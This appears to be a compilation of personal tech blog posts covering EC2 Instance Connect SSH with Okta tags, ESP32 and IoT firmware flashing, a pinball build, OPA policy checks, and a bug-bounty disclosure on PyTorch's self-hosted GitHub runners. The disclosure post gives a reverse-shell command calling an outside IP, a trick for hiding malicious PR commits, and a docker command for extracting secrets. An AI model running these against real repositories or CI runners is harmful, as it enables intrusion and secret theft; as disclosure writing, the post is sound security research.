I needed to PoC a solution for SSH users that are backed by an IdP but ran into some issues.
EC2 Instance Connect (IMO) seems to be way under-promoted by AWS, and I feel like that's a real disservice if you need (I'm so sorry for you) SSH (I do for this case).
The TL;DR for EC2 Instance Connect: you push a public key up with
aws ec2-instance-connect send-ssh-public-key --instance-id i-08e2c277f1ea9a99a --instance-os-user marcus.young --ssh-public-key file:///home/myoung/.ssh/asdf.pub
which makes it available at http://169.254.169.254/latest/meta-data/managed-ssh-keys/active-keys/marcus.young for 60 seconds. Within that window the user runs ssh -i {private key that matches the public key} marcus.young@{public ip of the instance} and gets in.
That's crazy cool, but we have a few issues outright (major ones):
- Impersonation: nothing stops me from passing --instance-os-user not.me and getting in.
- Observability: fine in small cases, bad at scale. You could tie a session back to a user, but that sucks. You'd have to correlate the SendSSHPublicKey CloudTrail call (which carries the IAM user/role in its request params) with the box, and if you're not shipping auth.log you're screwed. If 100 people do this at once you've lost; there's no way to see which key material let who in to run what.
If you thought "Oh, I'll use STS principal tags": I love you. Keep reading. Let's get started.
First we need to bring up an Okta with IAM Identity Center. Sorry peeps, but if you think I'm doing that walkthrough, just ctrl+w and touch grass. Not happening. Let's assume you have a working IdP and you can get into AWS. Let's start there.
So, impersonation. The answer here is an SCP plus STS principal tags. The principal tags part is sort of straightforward, unless you discover an IAM Identity Center bug like I did.
If you're using IAM Identity Center, you'll need to use https://aws.amazon.com/SAML/Attributes/AccessControl:{attr name} in Okta. The bug? Do not use both AccessControl and PrincipalTag attributes. Apparently IdC freaks out during the SAML jank and won't do anything.
So in Okta, add that attribute. Also, while you're at it, make sure you're using the nickName for the username.
At this point, go ahead and measure success by making sure that your user is in the first.last format and your AssumeRoleWithSAML call in CloudTrail has the principalTags in the requestParameters. And by that I mean: get angry, weep for 8 hours, then find out you're hitting an invisible AWS bug. I'll wait.
Thanks for coming back.
Your user doesn't have to be in this format, but it tracks with my needs, my SCP, and my janky NSS code. Modify it if you need. You do you.
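Once it works, the CloudTrail event should carry the tags. Roughly this shape (trimmed; values illustrative):

{
  "eventName": "AssumeRoleWithSAML",
  "requestParameters": {
    "principalTags": {
      "userName": "marcus.young"
    }
  }
}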
OK. Now that you're getting the tags, let's lock it down. We're going to apply this SCP:
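A minimal sketch of the idea, using the documented ec2:osuser condition key (statement naming and scoping are up to you):

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "DenySSHImpersonation",
      "Effect": "Deny",
      "Action": "ec2-instance-connect:SendSSHPublicKey",
      "Resource": "*",
      "Condition": {
        "StringNotEquals": {
          "ec2:osuser": "${aws:PrincipalTag/userName}"
        }
      }
    }
  ]
}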
Very cool, right? What we've done now is say that any call to SendSSHPublicKey has to have an --instance-os-user param that matches the userName principal tag that was set by Okta.
Prove it:
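Something like this (responses paraphrased):

$ aws ec2-instance-connect send-ssh-public-key \
    --instance-id i-08e2c277f1ea9a99a \
    --instance-os-user not.me \
    --ssh-public-key file:///home/myoung/.ssh/asdf.pub

An error occurred (AccessDeniedException) when calling the SendSSHPublicKey operation: ... with an explicit deny

$ aws ec2-instance-connect send-ssh-public-key \
    --instance-id i-08e2c277f1ea9a99a \
    --instance-os-user marcus.young \
    --ssh-public-key file:///home/myoung/.ssh/asdf.pub

{
    "RequestId": "...",
    "Success": true
}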
Bam. Now you can't just straight-up SSH as someone else.
OK that part’s done, but we still have another blocker: the user has to exist first. That sucks if you have a thousand users. I don’t know about you but I don’t want to have to sit there and crawl Okta for users that may never ssh in.
OK, so here's how the ec2-instance-connect software works (remember what SendSSHPublicKey does above and that it sends the key to the metadata endpoint): the package adds AuthorizedKeysCommand lines to /etc/ssh/sshd_config, and that command fetches http://169.254.169.254/latest/meta-data/managed-ssh-keys/active-keys/{user name} at login time. So we can't rely on crawling and we can't rely on SSH alone, but we can rely on NSS, since that's what sshd relies on for passwd lookups.
OK, so I sound like an expert, but I'm not. A large chunk of this was hacked out by another person at work, but I'm familiar enough. Don't lose hope in me yet. SSH talks to NSS, and we can hook into NSS to run some logic and create a user on the fly. So now in my user-data I have this sin:
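A sketch of the shape of it (the repo URL is a placeholder, and I'm assuming the NSS module is named "create" so it can sit on the passwd line):

#!/bin/bash
# compile the NSS module and wire it into nsswitch.conf
yum install -y gcc make git
git clone https://github.com/example/nss-create.git /opt/nss-create   # placeholder repo
make -C /opt/nss-create
cp /opt/nss-create/libnss_create.so.2 /usr/lib64/
# passwd lookups: existing users first, then the create hook, then files again for the re-lookup
sed -i 's/^passwd:.*/passwd: files create files/' /etc/nsswitch.conf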
I basically compile my NSS garbage and add "create files" to the passwd line in /etc/nsswitch.conf. This means that when a user attempts to SSH, NSS hooks in my C code, which calls a script. That script does a curl against http://169.254.169.254/latest/meta-data/managed-ssh-keys/active-keys/{user name}. If it gets a 2xx/3xx code (the user has put a public key in there; remember, this only works for 60 seconds), it creates the user. After create I still have files, so SSH will go back and look the user up in /etc/passwd. So assuming they ran the aws ec2-instance-connect send-ssh-public-key command and then tried to SSH within 60 seconds, they'll have a user with a matching public key and they'll get in.
Bonus: we should be able to use this to get into private instances. For this proof I'm going to assume you have a public instance at 1.2.3.4 and a private instance you want to reach at 10.0.0.50. Let's make your ~/.ssh/config file look like this:
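Something along these lines, using ProxyJump:

Host my-bastion
  HostName 1.2.3.4
  User marcus.young

Host private-vps
  HostName 10.0.0.50
  User marcus.young
  ProxyJump my-bastion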
Let's jump to that private-vps using my-bastion as a jump host. Hint: you'll need to make two SendSSHPublicKey calls, one to the public instance (so you can get into it) and one to the private instance (so you can also get into it).
First let’s prove we can’t just get in. So you know I ain’t lyin.
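The failed attempt looks something like:

$ ssh private-vps
marcus.young@10.0.0.50: Permission denied (publickey).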
Told you. Let's push the key to both (remember, you have 60 seconds; obviously I'd write a tool for this later).
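A sketch of the dance (instance IDs are placeholders):

$ aws ec2-instance-connect send-ssh-public-key \
    --instance-id {bastion-instance-id} \
    --instance-os-user marcus.young \
    --ssh-public-key file:///home/myoung/.ssh/asdf.pub
$ aws ec2-instance-connect send-ssh-public-key \
    --instance-id {private-instance-id} \
    --instance-os-user marcus.young \
    --ssh-public-key file:///home/myoung/.ssh/asdf.pub
$ ssh -i ~/.ssh/asdf private-vps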
Very cool. So what did we accomplish? Named, IdP-backed SSH users with no impersonation, and if I need to I can pkill sshd for a named user (a win over shared users) on the bastion and effectively kill them off everywhere.
This lets me send data from my Tilt to (in my case) Datadog via Zapier! Let's dive in.
The T-PicoC3 has two chips that can talk to each other over UART. For this I'm using MicroPython on the ESP32-C3 to read BLE for iBeacons (Tilts allowlisted), connect to Wi-Fi, and send the data both over UART and via HTTP POST. The RP2040 reads the UART and displays to the TFT.
You flash the different chips by USB-C polarity (flip the cable).
First we have to figure out which side is which. Plug it in and run dmesg: you'll see either something that says RP2040, or a JTAG device (that's the ESP32).
Let's erase this bad boy. You'll need to install esptool first.
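Something like this (the port will vary):

$ pip install esptool
$ esptool.py --chip esp32c3 --port /dev/ttyACM0 erase_flash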
Next let's grab the binary for the ESP32-C3. That is (currently) here:
$ wget https://micropython.org/resources/firmware/esp32c3-usb-20220618-v1.19.1.bin
Let's flash it:
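Per the MicroPython docs the ESP32-C3 image goes at offset 0x0, so roughly:

$ esptool.py --chip esp32c3 --port /dev/ttyACM0 --baud 460800 write_flash -z 0x0 esp32c3-usb-20220618-v1.19.1.bin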
If you want to send the data via HTTP POST, grab that here
$ wget https://raw.githubusercontent.com/pfalcon/pycopy-lib/master/urequests/urequests/__init__.py
Load up Thonny and flash it. Make sure you jump IO9 to GND (one-time cost). In Thonny, load up this code. Make sure to modify the HTTP POST information (or remove it altogether) as well as the Wi-Fi info. Hit save, choose the microcontroller, and you're done here.
Next: the other side. Flip your USB-C cable. Now hold the Boot button, press Run, and let go of Boot. The screen will go black and you should see a new drive show up named RPI-RP2. Let's flash it.
You'll need tinygo and go set up. If you don't, just drop in the prebuilt binary from here (assuming you trust me, but the RP2040 can't use Wi-Fi or anything anyway). Drop it into that RPI-RP2 drive and unmount it.
Bam. Done.
- 4/18: Initial research/exploit, with an automated case response.
- 4/20: First human response, forwarding to the PyTorch team.
- 4/27: I reached out to follow up.
- 5/11: Meta responds that there is no update.
- 6/9: I reach out again to ask about bounty terms and push back on a >6-week response time.
- 6/22: Meta responds: "Unfortunately after discussing this with the product team this isn't an issue we're going to fix or reward; although code execution is possible on these machines it's by design, and additionally the product team has mentioned that the actions are spun up on short-lived nodes (similarly to how GitHub operates their own Action runners), which limits the impact further."
- 6/24: I respond with multiple follow-ups explaining (and again exploiting further) the scope and severity, including secrets exfiltration, and prove lateral movement abilities. I exploit it further; PyTorch notices and bans my user. I set up a Zoom call to talk.
- 6/27: Call goes well. The team is respectful and insightful; we discuss remediation, what's affected, and scope.
- 6/30 - 7/22: I use favors to get in contact with the team after another month of no responses.
- 7/22: Meta responds "We're still in discussion with the product team" and refuses further discussion about impact and bounty.
- 8/16: Another follow-up sent, with no response.
- 8/19: After more favors I'm able to escalate to a new security engineer at Meta, who provides an extremely long and helpful response.
- 8/22 - 8/24: Back and forth about scope and impact.
- 8/24: Resolved, and a $10,000 bounty paid out with a 7.5% bonus due to the timeline.
I run a somewhat successful open source GitHub Actions runner project. GitHub provides CI runners, but they have some nuances around configuration and ability. You can run your own, however, if you have special needs such as hardware requirements, security policies, etc.
There's a lot of information around hardening these runners, and it indicates that running them on public repos is a bad idea. That said, if you need to, you still can; you should just be mindful of a few settings. The most important setting is what I decided to go after. That first checkbox isn't the default, but if you're not careful it seems safer than it is. What it means is that if you're not a new user, you can submit changes to the CI yaml and it'll affect what's run in the PR. So that's what I did.
I spent an hour or so using carefully crafted Google searches like site:github.com inurl:workflows +"self-hosted" and pulled up maybe 30 or so candidates. The issue is that there's no way to know if they have this checkbox set until you open a PR, at which point you potentially notify people of what you're doing. Throughout these pull requests I was able to further abuse a GitHub UI bug that lets me "hide my commit" so that it appears as though I merged my PR. It's confusing and weird, but it removes their ability to see what I was doing.
What I did here was:
1. Find a workflow that targets the self-hosted runners (runs-on: self-hosted) and replace a step with something innocuous like run: echo "Testing refactor".
2. Open the PR, which queues the workflow run.
3. Run git rebase -i HEAD^ and drop my commit. This is the key part: it basically resets my branch to the default branch's SHA, meaning there's no difference at all in tree history between the default branch (that I targeted for a PR) and the current branch/PR.
4. git push origin {branch_name} -f
The bug above is simply that the GitHub UI now sees no changes on the branch (0 files changed). And since the SHA exists as the HEAD SHA on the default branch, it looks merged. Now there's no way to see what I did. The emails from git only show a link to the PR with some metadata that a file changed, but not what. If someone had an integration, it would have had to pull the diff from my SHA to theirs immediately; because I force-pushed, that commit no longer exists in my fork, so it's gone forever, and after a few seconds there's no way to pull up what my change showed.
The best part: it had already kicked off a potential GitHub Actions run. So here one of two things happens: either nothing runs (their settings saved them), or a self-hosted runner picks up the job and runs my echo "Testing refactor" step.
Now it's late at night, and I've submitted and undone roughly 30 PRs until I get a hit.
PyTorch.
This repo has a ton of yml in all shapes and fashions, and it makes sense to use self-hosted runners because of all the specialized hardware for GPU acceleration. I basically had free rein over any of these now that I could submit any change to CI. The only question: is there monitoring in place? Honestly, that isn't common, because CI is just all over the place. Tests change, infra is all over the place, requirements change in dependencies, etc.
So I decided to shell in with a reverse shell. A reverse shell means I make the target connect out to something I control so that I can get into it, as opposed to me connecting in directly. Same result, but backwards. To do that I spun up a small Digital Ocean box and set up a reverse shell listener with nc -lvp 9001.
On CI I issued a pull request with run: sh -i 5<> /dev/tcp/143.110.155.178/9001 0<&5 1>&5 2>&5
On my Digital Ocean box: I'm now connected to the machine.
From here I noticed two things. Basically: they wouldn't live forever, but I had root on both.
My first attempt was to exfiltrate CI secrets, but this didn't quite work because forks can't exfiltrate secrets via the actions yaml (they're not in the forked repo). I was able to prove, however, that a few things such as Android builders ran via Docker and would land on these instances with the secrets nightly and on-demand. I can't force that to happen, but I would be able to exfiltrate the signing key once the Docker container was running, with docker inspect {container id} | jq '.[].Config.Env[0]'.
Next: AWS abuse. I wasn't able to confirm it all directly, but these instances had access to many S3 buckets. They likely had write access to some, meaning I could plant files, but that's boring. What they did have, though, was ECR image access. Without ECR immutable tags turned on (confirmed), I would be able to rebuild any image used by downstream internal projects. Meaning that if downstreams weren't pinning images to their build SHAs (most don't, on latest or semver tags in general), I could implant anything into these containers and re-push them so that downstream projects would pull them. The effect of this at this time is unknown, as this isn't the PyTorch distributable, but the hope would have been an internal supply-chain attack. This scope stays "tbd".
It also didn't appear that these ran in a VPC, meaning that unless security software is installed, there's nothing to prevent me from doing boring malicious stuff like mining crypto, blasting emails, etc. If they were in a VPC I'd still have this possibility, but things like GuardDuty (if enabled) would catch me and flag it as irregular activity. Not worth it here, and a good way to violate responsible disclosure.
The IAM access (both the role attached to the instance and the IAM user) was overprovisioned, which also contributed to the bounty. The PyTorch team is further lowering the permissions here to only what's necessary, as well as (I'm assuming) adding bucket policies to match.
About a year ago I got my hands on a Batman pinball in very bad shape, gutted, for $300 (an unheard-of price even for that shape).
I decided to go all in and just wing it.
I removed the legs and bought new Williams/Bally black legs from pinballlife.com
You can see the shape it's in generally. The wood is completely broken on every edge. The rails and lockdown bar were rusted but otherwise in great shape. I contacted someone locally who does metal work and got them brushed, then powder coated. They came out looking brand new.
Next was the body work
I got the new artwork from Retro Refurbs. They're vinyl, which kind of stinks compared to the original artwork. Don't get me wrong, it looks absolutely fantastic, but there's something about the original artwork being printed directly on the wood that I love (I dunno what that process is called).
The front speaker panel was missing everything and the logo was obviously hand painted. I bought new grills and used an angle grinder to en-biggen the cutout for a PinDMD v3. I did a shit job (because angle grinder), so after the DMD fit I 3D printed a bezel that came out looking great.
Next was the screen.
I only had a 22" LCD, and it just looked bad. There was so much wasted space: the backglass housing is a near-perfect square, so a rectangle left a ton of vertical space even though the panel was fairly large. I used this time to research square LCDs. Turns out these are niche af. I ended up landing on an LM265SQ1-SLA1, a 26.5" square panel at 1920x1920. I also found an unbranded 12V board that claimed to support that resolution and the same 4-channel, 8-bit, 92-pin LVDS connector. It worked out great. You can see the size difference between the original on the left and the LM265SQ1 on the right from the backside. It was also expensive as shit at roughly $500 for the screen + controller.
I then mounted it using the same bracket as before plus a sliding lock, and got a local glass shop to cut a custom tempered 1/4" glass panel for it. It ended up a few millimeters too wide, so it's a total pain to get in, but I was able to do it without shattering it.
I then started putting a computer in it. I used an Intel i5 with a Quadro M4000 I happened to be sitting on. I originally mounted it normally, but that didn't work with the coin door, and I really wanted the computer to be reachable where it was since it fit great. I ended up getting a PCIe flex cable and mounted the card to the side with a stand to survive gravity. I also 3D printed custom mounts for the power supply and coin buttons so I could mount momentary switches and use the coin buttons as inputs for the VirtuaPin controller + digital plunger.
Next I found a 46" TV that fit like a dream after removing the LCD from its panel. I ended up mounting it similar to this (not my pinball in this photo):
I ended up welding pipe mounts directly to the steel backing on the LCD. This was a risky move considering the ... you know ... electrical nature and heat of a welding machine, but it worked. I went slow, did just a few tack welds, then slid a galvanized pipe through so I can lift it up for access. Then I built a bezel out of wood, wrapped it in black vinyl, and laid the glass in. Lastly I resin-printed a bunch of custom L-brackets (because I wanted them as tiny as possible and couldn't find any under 6mm wide). I printed about 24 at a time, so it took a few days.
After carefully taking it home, I set it up and put the Batman Returns Lego Batmobile the kiddo and I built on top as a DIY topper.
The software it's running is still in progress but works great. Just turn it on and Windows loads the PinballX front end, which pulls in some Pinball FX3 games (cheesy, but people who come over love them) and some VPX games (which look almost real!) like Johnny Mnemonic, Addams Family, etc. The bumpers and gyro all work great. I have a servo in there, but it draws too much power if you press the bumpers too fast, which causes the USB bus to falter and require a Windows restart, so I've not hooked it back up.
If you're curious, here's some of the parts list. If I had to guess, I spent roughly $1500 out of pocket. If I weren't sitting on parts it would be closer to $2200.
I backed this project because Plaato makes really good quality stuff, and the idea of having a weight-based keg estimator for my barcaderator was key. They promised multiple times they'd allow people to capture the data themselves. They have yet to deliver.
So I decided: why not do it myself?
In January 2020 I did a PyTN talk about how to sniff the data. While cool, it didn't really bear much fruit: the amount of effort to make that my end game was a bit much, and I'd be reliant on always intercepting it. I did, however, learn that it's got an ESP32-D0W0 (WROOM) as the brains, and it didn't look that complicated.
So I took it down again and flashed a basic ESPHome build to it (the code is here). This was easier than it looks; you just need a steady hand. Once you flash it the first time, you can do pure OTA updates. I won't go into absolute detail, but you can just look at the pinout for the ESP32 and solder leads to the pins directly: RX, TX, GND, VCC, and GPIO0 (grounded) to an FTDI programmer.
First I made a backup of the original firmware:
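Something like (assuming the full 4MB flash):

$ esptool.py --port /dev/ttyUSB0 --baud 115200 read_flash 0x0 0x400000 plaato-orig.bin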
Then I flashed the new one built from ESPHome:
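Roughly:

$ esptool.py --port /dev/ttyUSB0 --baud 460800 write_flash 0x0 plaato-keg.bin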
Now it shows up in ESPHome as expected!
I then used a (very old) oscilloscope to try to map out the load cells. The load cell combinator is pretty boring (yayyy): it just drags the voltage, ground, data, etc. over a ribbon cable to the main PCB. The main PCB uses a P## notation that is not 1:1 with the ESP32 pins (booooo). I was able to discover that the clock for this is P14. I then used a multimeter to correlate P14 to GPIO16 (by dragging the other lead across all the ESP32 pins until a beep gave it away). Doing the same, I discovered the data pin from the load cell combinator is P28, and my handy-dandy multimeter let me correlate P28 to GPIO17 on the ESP32. I was able to figure out the LEDs without an oscilloscope by just using a multimeter: the main PCB just drives those GPIO pins high or low to run the 3 LEDs, which is boring (yay).
The rest was trial and error.
Next I set up Zapier webhooks: ESPHome sends an HTTP POST to Zapier, which then forwards the data to Datadog. Check out the repo for my up-to-date ESPHome yaml.
This took about a year, off and on. With covid I finally found some time to finish it.
I ran into a lot of issues:
- Mixing up GPIOA and GPIOB for EXPANDER_COL_REGISTER and EXPANDER_ROW_REGISTER.
- SPLIT_KEYBOARD does not work with an IO expander like the MCP23018. This is poorly documented, IMO: you have to use two of the same chipsets to use that feature, and the Feather 32u4 ain't cheap.
If you see a trend in my latest blogs, you'll likely guess I really like OPA. We use it in EKS to report on assertions consistently across all our clusters, and I use it to run tests against the Gatekeeper rules. It's pretty awesome, and it supports terraform plans.
I started off by forking the upstream atlantis AMI and baking the aws-cli into it.
In my atlantis.yaml I set up all the repos to use a new workflow, opa-workflow, like so:
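A sketch of the workflow (bucket and key layout assumed; $PLANFILE, $WORKSPACE, $PULL_NUM, and $HEAD_COMMIT are variables Atlantis provides to custom run steps):

workflows:
  opa-workflow:
    plan:
      steps:
        - init
        - plan
        - run: terraform show -json $PLANFILE > "${WORKSPACE}_${PULL_NUM}_${HEAD_COMMIT}.json"
        - run: aws s3 cp "${WORKSPACE}_${PULL_NUM}_${HEAD_COMMIT}.json" "s3://my-tfplan-bucket/terraform/tfplan/"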
This pushes the plan file as production_1234_somesha11122.json into the bucket. Next we have an AWS Lambda with conftest built in. It responds to terraform/tfplan/*.json S3 create notifications, parses the SHA, PR number, and workspace (from Atlantis) out of the key, then runs:
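Roughly (policy dir assumed):

$ conftest test production_1234_somesha11122.json -p ./policy --output json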
Once this works, we can parse the results back into a comment and send a success|failure status to the git SHA!
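A sketch of the status call against the GitHub API (owner/repo are placeholders; the comment side works the same way against the issues API):

$ curl -s -X POST \
    -H "Authorization: token $GITHUB_TOKEN" \
    "https://api.github.com/repos/{owner}/{repo}/statuses/${SHA}" \
    -d '{"state": "success", "context": "conftest", "description": "All policies passed"}'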
I've had a few people ask me why I did it this way, as an AWS Lambda, versus just running it on Atlantis. I actually tried that first, but it wasn't "clean".
First: if atlantis plan fails, it's not very intuitive, especially if it's not a terraform error. It's kind of an unformatted stack trace. With that exception style it's not very feedback friendly. The point of this project is to provide a clean feedback loop for those who may not know or care what OPA is. We have quite a few methods of automatically generating terraform projects from cookiecutter + modules, and I wanted a way of providing as much context as possible.
Next: we have a fairly large engineering team and I like to work in a "plugin" model. When I'm introducing something new I like to be able to toggle it on and off quickly, or gather metrics before pushing for changes. This way it's completely separated from Atlantis and has its own SDLC, which is nice from a "Marc, you broke everything" perspective.
Lastly, I had to make a call from a security perspective. The point of this is 100% to let the upper architectural/infosec level make assertions. For example: tagging. Tagging for us is partially for billing, partially to see our accountability plane, but mostly so that we can scope least privilege. Having this in Atlantis would mean the policies live in the Atlantis repo for the container builder, and I don't want to bounce Atlantis every time we add or change policies. Otherwise it would mean the policies live with the terraform, which means you could modify the assertions per branch, which is also a choice we made to avoid. These policies are open for contribution from everyone, but it's an explicit rule that they're not meant to be shifted per branch, to avoid a threat model around modifying them to pass when they shouldn't.
I've spent the last year figuring out what I want controlling "things" in my house, and after wasting a bunch of time and money I finally have a setup I like.
I don't have any crazy networking gear, just a Netgear R7000 running Kong. I now have a very different setup. Configuring this for my setup was painful, but here's how it went.
First I played with Tasmota, and the devices would randomly require me to set them up again. Have you ever bought a device that turns on, sets up an AP for you to connect to, and then lets you configure it? That's a lot like Tasmota. The problem is that within just a few days I had to set up the same devices multiple times: I'd go to do something, it wouldn't exist in Home Assistant, and I'd see a few tasmota-##### APs I had to set up again. I solved this by pulling the source code down, modifying the configs (which took a lot of figuring out for the settings), compiling it, and flashing it. Per device. Then I had to upload the actual config for pins/buttons/etc. I hated this. Every second of it.
After playing around with way too many things, I finally landed on ESPHome. ESPHome is amazing. It has over-the-air updates, and it automatically compiles based on some yaml and uploads it! If it can't upload (like the initial flash), I simply set up the yaml, compile it, SCP it locally, and flash it with https://github.com/espressif/esptool. From then on it supports OTA updates. Because it's a bunch of yaml, I can source control it too! It uses passwords for both API integrations (Home Assistant) and for OTA updates (same or different password), which makes me feel good. Also: the server runs as a container, so it's running on my server network on Nomad. I can simply go to http://esphome.service.consul and click "Upload" to update my IoT.
As for controlling the devices, I chose Home Assistant; it has great support for ESPHome.
This is what you're really here for. Everything is ESP-based for ESPHome. I flashed almost all of these with an FTDI serial adapter and esptool.py, similar to:
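Something like:

$ esptool.py --port /dev/ttyUSB0 erase_flash
$ esptool.py --port /dev/ttyUSB0 --baud 115200 write_flash 0x0 firmware.bin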
This one took some learning to get right. It's a NodeMCU ESP8266 hooked up to a 12V relay shimmed to the garage door trigger. Triggering GPIO16 triggers the relay. Attached to GPIO5 is a reed switch on the garage door track that is open or closed. The reed switch is a magnet-based switch: when a magnet is near it, it breaks the switch (open), meaning the garage door is closed. I wired it this way so that the only way the door can be considered "closed" is that the magnet has broken the sensor. No power, a messed-up sensor, manually opened (without using the garage door chain), etc. would all be considered an open door. I chose this because I'd rather be safe than sorry: the door being closed is not an assumption but a fact.
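A trimmed sketch of the config (names and Wi-Fi credentials are placeholders; the momentary-relay logic is simplified):

esphome:
  name: garage_door
  platform: ESP8266
  board: nodemcuv2

wifi:
  ssid: "iot-ssid"
  password: "iot-pass"

api:
ota:

switch:
  - platform: gpio
    pin: GPIO16
    id: door_relay
    name: "Garage Door Trigger"

binary_sensor:
  - platform: gpio
    pin:
      number: GPIO5
      mode: INPUT_PULLUP
    name: "Garage Door"
    device_class: garage_door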
This one is in progress. It works, but I haven't finished the housing (it needs to be gasket-based and ABS). It's based on a Wemos D1 Mini and is essentially two 12V solenoid valves on GPIO16 and GPIO14. The 12V is switched through diodes and TIP120s fed from a 12V source (dropped to 5V via an LM7805 for the D1 Mini).
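A sketch of the valve switches (names assumed; the usual wifi/api/ota boilerplate omitted):

switch:
  - platform: gpio
    pin: GPIO16
    name: "Sprinkler Zone 1"
  - platform: gpio
    pin: GPIO14
    name: "Sprinkler Zone 2"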
This one is still a bit in progress. My end goal is to take snapshots on an interval and push them to S3 so that I can play around with machine learning, but right now it lets me view the feed in hass (no recording as of now). I chose the ESP32-CAM because it's very cheap (that's all) and it supports ESPHome. The housing I 3D printed from here. Note: this was a bit annoying to set up the first time. You can't "just flash it"; you need to set up SPIFFS correctly first.
In the kids' room I have some star lights, and on our pergola I have some waterproof LED strips, all controlled with this Magic Home smart controller. I chose it because it's ESP8266-based and flashable! Wiring it up to the FTDI, I flashed a yaml along these lines:
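A sketch (pin assignments are assumptions; Magic Home boards vary by revision):

output:
  - platform: esp8266_pwm
    id: output_red
    pin: GPIO14
  - platform: esp8266_pwm
    id: output_green
    pin: GPIO12
  - platform: esp8266_pwm
    id: output_blue
    pin: GPIO13

light:
  - platform: rgb
    name: "Pergola Lights"
    red: output_red
    green: output_green
    blue: output_blue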
For the bulbs I chose the Globe brand because they're also ESP8266-based. For 2 of the 3 I had success with tuya-convert, which was pleasant: basically I built my .bin from my ESPHome yaml, replaced tasmota.bin in that dir with it (because I'm sneaky), ran tuya-convert, flipped the light off/on 3 times, and it flashed. For 2 of them (1 I broke), I had to get down and dirty: I tore them apart and followed this guide. Temporarily soldering and removing all the heat-safe gunk is not fun. But 1 flashed. 1... caught fire...
These come in handy for seasonal stuff like xmas lights, etc., but especially for my 3D printer as an emergency safety measure (forgot to turn it off, etc.). I chose the Sonoff S31: easy to take apart, a bit annoying to flash (involves temporary soldering), but they work amazingly. The yaml makes sure it's on by default and that the power button is a hard toggle for the relay, for manual control. The blue light indicates Wi-Fi; red indicates on/off for the relay.
I kept blowing my outdoor smart bulb (I'm guessing the voltage or current out there is too volatile?), so here I went with a switch instead: the TreatLife single pole. This yaml lets the LED indicator (GPIO4) toggle with the virtual button (GPIO13) and the physical button (GPIO12):
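A sketch wiring those three pins together (I'm assuming the "virtual button" on GPIO13 is the relay itself):

output:
  - platform: gpio
    pin: GPIO4
    id: led

switch:
  - platform: gpio
    pin: GPIO13
    id: relay
    name: "Porch Light"
    on_turn_on:
      - output.turn_on: led
    on_turn_off:
      - output.turn_off: led

binary_sensor:
  - platform: gpio
    pin:
      number: GPIO12
      mode: INPUT_PULLUP
      inverted: true
    id: physical_button
    on_press:
      - switch.toggle: relay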
I was at KubeCon in mid-November with an old roommate (in the same industry as me) and some coworkers, and got to see some cool Kubernetes stuff. Since my job crosses the security boundary, and I'm fairly new to k8s, most of the talks I went to were either basic-level or OPA-related. With OPA, what you get is a lightweight language to write policies your Kubernetes cluster should adhere to. Typically (I think) this is traditionally run by building your policies into a sidecar and registering it as an admission controller. Gatekeeper simplifies this by removing the sidecar in favor of native CRDs and adds a few things like audit logs.
I’m going to build up an example of this using EKS.
I assume we have a working EKS cluster.
Before we deploy anything, let's set up Gatekeeper v3:
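At the time of writing, the upstream install is a single manifest:

$ kubectl apply -f https://raw.githubusercontent.com/open-policy-agent/gatekeeper/master/deploy/gatekeeper.yaml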
Gatekeeper should now be running (albeit with no policies); you can check with kubectl get pods -n gatekeeper-system.
Next, before we move on, I'm going to set up policykit so that we can write real rego (the language for OPA) instead of rego embedded inside yaml. This allows policy testing, etc. later on.
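Mine is along the lines of the k8sallowedrepos policy from the gatekeeper library:

package k8sallowedrepos

violation[{"msg": msg}] {
  container := input.review.object.spec.containers[_]
  satisfied := [good | repo = input.parameters.repos[_]; good = startswith(container.image, repo)]
  not any(satisfied)
  msg := sprintf("container <%v> has an invalid image repo <%v>, allowed repos are %v", [container.name, container.image, input.parameters.repos])
}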
What we have now is a rego file that will validate base images (parameterized). Let’s write some tests.
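Sketches of a passing and a failing case:

package k8sallowedrepos

test_image_from_allowed_repo {
  in := {
    "review": {"object": {"spec": {"containers": [{"name": "web", "image": "alpine:3.10"}]}}},
    "parameters": {"repos": ["alpine"]}
  }
  count(violation) == 0 with input as in
}

test_image_from_disallowed_repo {
  in := {
    "review": {"object": {"spec": {"containers": [{"name": "web", "image": "nginx:latest"}]}}},
    "parameters": {"repos": ["alpine"]}
  }
  count(violation) == 1 with input as in
}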
Now let’s generate our ConstraintTemplate (the basic template that accepts parameters):
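Assuming policykit's pk CLI, it's a one-liner (flags may differ by version):

$ pk build k8sallowedrepos.rego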
Let’s see what that ConstraintTemplate looks like:
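It comes out looking roughly like the k8sallowedrepos template from the gatekeeper library:

apiVersion: templates.gatekeeper.sh/v1beta1
kind: ConstraintTemplate
metadata:
  name: k8sallowedrepos
spec:
  crd:
    spec:
      names:
        kind: K8sAllowedRepos
      validation:
        openAPIV3Schema:
          properties:
            repos:
              type: array
              items:
                type: string
  targets:
    - target: admission.k8s.gatekeeper.sh
      rego: |
        package k8sallowedrepos
        violation[{"msg": msg}] {
          container := input.review.object.spec.containers[_]
          satisfied := [good | repo = input.parameters.repos[_]; good = startswith(container.image, repo)]
          not any(satisfied)
          msg := sprintf("container <%v> has an invalid image repo <%v>, allowed repos are %v", [container.name, container.image, input.parameters.repos])
        }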
As you can see, the rego is now embedded inside a ConstraintTemplate yaml. Apply it with kubectl apply.
We have a template but no OPA rules yet.
Let's add a rule to deny anything that's not from alpine (ironically the opposite of secure):
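A sketch of the constraint:

apiVersion: constraints.gatekeeper.sh/v1beta1
kind: K8sAllowedRepos
metadata:
  name: repo-must-be-alpine
spec:
  match:
    kinds:
      - apiGroups: [""]
        kinds: ["Pod"]
  parameters:
    repos:
      - "alpine"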
We can now see Gatekeeper has it (kubectl get k8sallowedrepos).
Let's push up a Helm chart that violates it.
Did it work?
It's not running. Looking at the events, the Gatekeeper admission webhook denied the pods.
And just like that we enforced a policy that prevented this from running!
More to come from OPA as I get more comfortable with it and learn how to test the policies before they go into K8S!
I recently got into doing random stuff with arcades. In October 2018 I got ahold of a completely ripped-apart San Francisco Rush cabinet. I redid some of the wood, built a computer into it, reversed all the controls into a Teensy, and made it play Rocket League. My tattoo shop is currently painting it (build log to come when I have it back).
In trade, I’m fixing their arcade machine.
So now apparently I like real arcade machines and not my now-broken table top.
I also brew beer. Why not combine the two?!
So I introduce to you:
The LattePanda runs Ubuntu with MAME. I originally chose Windows, but LEDBlinky is awful. Just awful. So instead I've been working with LEDSpicer by Patricio Rossi. The software worked nearly out of the box, and he's been super helpful in getting me up and running.
I recently came across some neglected and forgotten "Aviary" scooters and wanted to see what could be done. This was the easiest hack I've ever done: remove the top panel with security bits and replace the board with one from eBay similar to this. Plug it in and go. Done. Cost: ~$40.
This one was much more fun.
